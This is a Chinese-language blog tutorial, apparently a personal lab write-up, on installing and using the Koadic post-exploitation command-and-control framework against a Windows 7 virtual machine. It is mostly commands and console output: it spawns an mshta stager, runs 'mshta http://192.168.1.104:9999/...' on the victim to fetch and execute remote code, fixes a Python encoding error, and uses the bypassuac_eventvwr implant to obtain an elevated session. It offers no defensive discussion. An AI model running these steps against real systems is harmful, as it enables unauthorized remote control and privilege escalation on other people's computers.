Koadic的安装和使用
概述
Koadic是DEFCON分型出来的一个后渗透工具,主要通过vbscript、jscript进行大部分操作
环境准备
我准备的是两台虚拟机一台kali就是攻击机器
一台windows7 64位就是受害者了
安装
安装很简单
git clone https://github.com/zerosum0x0/koadic.git
之后安装依赖
cd koadic/
pip install -r requirements.txt
使用
运行
./koadic
.
/ \\
\_ \_ | |
| | \_\_\_\_\_ \_\_ \_ \_\_| || | \_\_\_
| |/ / \_ \\ / \_\` |/ \_\` ||.| / \_\_|
| / (o) | (\_| | (\_| ||.|| (\_\_
|\_|\\\_\\\_^\_/ \\\_\_,\_|\\\_\_,\_||:| \\\_\_\_|
|:|
~\\====/~
O
-{ COM Command & Control }-
Windows Post-Exploitation Tools
Endless Intellect
~\[ Version: 0x8 \]~
~\[ Stagers: \]~
~\[ Implants: \]~(koadic: sta/js/mshta)#
首先我们得知道这个工具的几个概念
- Stagers 就是在你攻击的机器上生成的payload的种类
- Implants 就是当你控制机器后可以进行的操作
具体Stagers和Implants你可以看它的github页面
https://github.com/zerosum0x0/koadic
接着我们执行
use stager/js/mshta
就是使用mshta这个stager
之后设置本机的端口和ip,进行本地监听
你可以输入info命令来查看要设置的参数
set LHOST 192.168.1.104
set LPORT
接着运行
run
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/BYhBU
[>] mshta http://192.168.1.104:9999/BYhBU
因为是后渗透工具,所以不管怎么说你肯定能在你控制的电脑上执行一条命令
在受害者机器上执行
mshta http://192.168.1.104:9999/BYhBU
我的话直接打开一个cmd执行就好了
接着会有一个python字符的坑,会出现下面这个错
(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.1.110', )
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line , in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line , in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line , in __init__
self.handle()
File "/root/koadic/core/handler.py", line , in handle
return BaseHTTPRequestHandler.handle(self)
File "/usr/lib/python2.7/BaseHTTPServer.py", line , in handle
self.handle_one_request()
File "/usr/lib/python2.7/BaseHTTPServer.py", line , in handle_one_request
method()
File "/root/koadic/core/handler.py", line , in do_POST
self.session.parse_user_info(data)
File "/root/koadic/core/session.py", line , in parse_user_info
data = data.decode().split("~~~")
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
[!] Zombie : Timed out.
就是下面这个错误
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
你只要把字符编码换成utf-8就好了
怎么做呢看下面
首先退出程序
打开下面这个文件
vim koadic
添加上
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
总的文件是下面这个样子的
#!/usr/bin/env python
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
Copyright (c) - RiskSense, Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use the software except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
Disclaimer:
Usage of Koadic for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state,
federal, and international laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program.
__version_info__ = (, )
__version__ = "x".join(map(str, __version_info__))
__license__ = "Apache 2.0"
__credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"]
if __name__ == "__main__":
import core.shell
banner = open("data/banner.txt", "rb").read().decode("unicode\_escape")
shell = core.shell.Shell(banner, \_\_version\_\_)
shell.run()之后重新进行上面的操作就不会报错了
.
/ \\
\_ \_ | |
| | \_\_\_\_\_ \_\_ \_ \_\_| || | \_\_\_
| |/ / \_ \\ / \_\` |/ \_\` ||.| / \_\_|
| / (o) | (\_| | (\_| ||.|| (\_\_
|\_|\\\_\\\_^\_/ \\\_\_,\_|\\\_\_,\_||:| \\\_\_\_|
|:|
~\\====/~
O
-{ COM Command & Control }-
Windows Post-Exploitation Tools
Endless Intellect
~\[ Version: 0x8 \]~
~\[ Stagers: \]~
~\[ Implants: \]~(koadic: sta/js/mshta)# use stager/js/mshta
(koadic: sta/js/mshta)# set LHOST 192.168.1.104
[+] LHOST => 192.168.1.104
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/N435X
[>] mshta http://192.168.1.104:9999/N435X
[+] Zombie : Staging new connection (192.168.1.110)
[+] Zombie : WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 专业版
(koadic: sta/js/mshta)#
之后我们进行权限提升也就是uac bypass
输入zombies来查看我们控制的机器
(koadic: sta/js/mshta)# zombies
ID IP STATUS LAST SEEN
--- --------- ------- ------------
192.168.1.110 Alive -- ::Use "zombies ID" for detailed information about a session.
输入zombies 0可以查看这台机器的详细信息
(koadic: sta/js/mshta)# zombies
ID:
Status: Alive
Last Seen: -- ::
IP: 192.168.1.110
User: WIN-HK90RUM6L1B\\bboysoul
Hostname: WIN-HK90RUM6L1B
Primary DC: Unknown
OS: Microsoft Windows 专业版
OSArch: -bit
Elevated: No
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.; SLCC2; .NET CLR 3.5.; .NET CLR 3.0.; Media Center PC 6.0)
Session Key: f4d7735b8a9d45a5a74ed5a63a164421
JOB NAME STATUS ERRNO
---- --------- ------- ------- 可以看到Elevated这里显示no表示我们没有进行提权
输入
use implant/elevate/bypassuac_eventvwr
查看一下这个模块的信息
(koadic: imp/ele/bypassuac_eventvwr)# info
NAME VALUE REQ DESCRIPTION
----- ------------ ---- -------------
PAYLOAD yes run payloads for a list
ZOMBIE ALL yes the zombie to target这里我们把payload和zombie设置为0,就是表示payload为0不使用,zombie的编号为0
接着run就好了
(koadic: imp/ele/bypassuac_eventvwr)# run
[*] Zombie : Job (implant/elevate/bypassuac_eventvwr) created.
[+] Zombie : Job (implant/elevate/bypassuac_eventvwr) completed.
[+] Zombie : Staging new connection (192.168.1.110)
[+] Zombie : WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 专业版
成功
但是注意的是程序新建立了一个链接来bypass所以原来那个zombie连接虽然存在但是还是没有进行提权的用户,新建的那个连接才是进行提权过的用户,不信输入zombie看一下是不是多出了一个链接
(koadic: imp/ele/bypassuac_eventvwr)# zombies
ID IP STATUS LAST SEEN
--- --------- ------- ------------
192.168.1.110 Alive -- ::
\* 192.168.1.110 Alive -- ::Use "zombies ID" for detailed information about a session.
看一下zombie 1的信息
(koadic: imp/ele/bypassuac_eventvwr)# zombies
ID:
Status: Alive
Last Seen: -- ::
IP: 192.168.1.110
User: WIN-HK90RUM6L1B\\bboysoul\*
Hostname: WIN-HK90RUM6L1B
Primary DC: Unknown
OS: Microsoft Windows 专业版
OSArch: -bit
Elevated: YES!
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.; SLCC2; .NET CLR 3.5.; .NET CLR 3.0.; Media Center PC 6.0)
Session Key: c42dec18786a47f2bc4ee023dc8f69bd
JOB NAME STATUS ERRNO
---- --------- ------- ------- 是提权成功的
提权成功之后的机器我们可以使用implant里所有的模块,具体的模块自己研究吧
手机扫一扫
移动阅读更方便
你可能感兴趣的文章